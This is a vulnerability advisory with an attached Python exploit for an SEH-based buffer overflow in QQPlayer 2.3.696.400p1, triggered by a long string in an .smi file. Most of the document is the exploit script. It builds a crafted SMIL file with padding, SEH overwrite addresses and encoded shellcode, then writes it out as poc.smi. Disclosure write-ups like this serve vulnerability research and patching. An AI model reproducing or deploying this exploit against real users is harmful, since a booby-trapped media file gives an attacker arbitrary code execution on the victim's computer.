QQplayer 2.3.696.400p1 Buffer Overflow

`QQplayer smi File Processing Buffer Overflow Vulnerability  
  
By Lufeng Li of Neusoft Corporation  
  
Vulnerable: QQPlayer<=2.3.696.400p1  
  
Vendor: Tencent Inc  
  
1) Software Description:  
QQPlayer is developed by Tencent Inc.It is very popular universal multimedia player in China.  
  
2) Details:  
A buffer overflow vulnerability in QQplayer that Processing smi file. allows remote attackers to execute arbitrary code via a long string in an smi file.   
  
3) Timeline:  
2010.05.26 Vendor notified   
2010.06.8 Vendor released new fixed versions(QQplayer 2.4.716.400p1)  
2010.07.26 Advisory released  
  
4) Exploit:  
#!/usr/bin/env python  
  
#################################################################  
#  
# Title: QQPlayer smi File Buffer Overflow Exploit  
# Author: Lufeng Li of Neusoft Corporation  
# Vendor: www.qq.com  
# Platform: Windows XPSP3 Chinese Simplified  
# Tested: QQPlayer 2.3.696.400p1  
# Vulnerable: QQPlayer<=2.3.696.400p1  
#   
#################################################################  
# Code :  
  
head ='''<smil>  
<head>  
<meta name="title" content="_"/>  
<meta name="author" content="Warner Music Group'''  
  
junk = "A" * 2001  
nseh ="\x42\x61\x21\x61"  
seh ="\x39\x0c\x41\x00"  
adjust="\x30\x83\xc0\x0b"  
shellcode=("PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLM8LI5PUPUPSPMYZEV"  
"QN2BDLKPRVPLKQB4LLK0RR4LKSBWX4ONW1ZWVFQKO6QO0NLWL3QSLS26L7PIQ8ODM5QIWKRZPPRQGL"  
"KQB4PLKPB7L5QXPLKQP2XK5IP44QZ5QXPPPLKQX4XLKQHGPUQN3KSGLQYLKP4LKUQ9FFQKOVQO0NL9"  
"QXODM5QYWFXKPD5JT4C3MZXWK3MWTT5KRPXLKQHWTEQ8SCVLKTLPKLKQH5LEQN3LKS4LKC1XPMY1TW"  
"TGT1KQKSQ0YPZ0QKOKP0XQOQJLKTRJKMVQMCZUQLMLEOIUPUPC0PPRHP1LKROLGKON5OKZPNUORF6R"  
"HOVLUOMMMKOIE7LC6SLUZMPKKM0BU5UOKQWB32R2ORJ5PPSKOHUE3512LSS6N3U2X3UUPDJA")  
junk_="R"*8000  
foot ='''"/>  
</head>  
<body>  
<seq>  
<video src="rtsp://sos2208-1-rm.edgestreams.net/listeningparties/424444/.uid.MSAaAQCGwp9yU7mAOw6d182868f6d3c28b7f158b74fef576e1.424444_specialops.rm?  
  
auth=caEdAc4dqaVcqbHcobOcGaVdaaOdXarcBat-bl.oeA-eS-HEGqpvyyvzDzssup&aifp=0001" title="_" author="Warner Music Group" copyright="2007 Rhino Entertainment"   
  
fill="freeze"/>  
</seq>  
</body>  
</smil>  
<!-- Generated by Akamai Stream OS BOSS (v10.0.14-20100129) / d366992c -->'''  
payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot  
  
fobj = open("poc.smi","w")  
fobj.write(payload)  
fobj.close()  
  
---------------------------------------------------------------------------------------------------  
Confidentiality Notice: The information contained in this e-mail and any accompanying attachment(s)   
is intended only for the use of the intended recipient and may be confidential and/or privileged of   
Neusoft Corporation, its subsidiaries and/or its affiliates. If any reader of this communication is   
not the intended recipient, unauthorized use, forwarding, printing, storing, disclosure or copying   
is strictly prohibited, and may be unlawful.If you have received this communication in error,please   
immediately notify the sender by return e-mail, and delete the original message and all copies from   
your system. Thank you.   
---------------------------------------------------------------------------------------------------  
`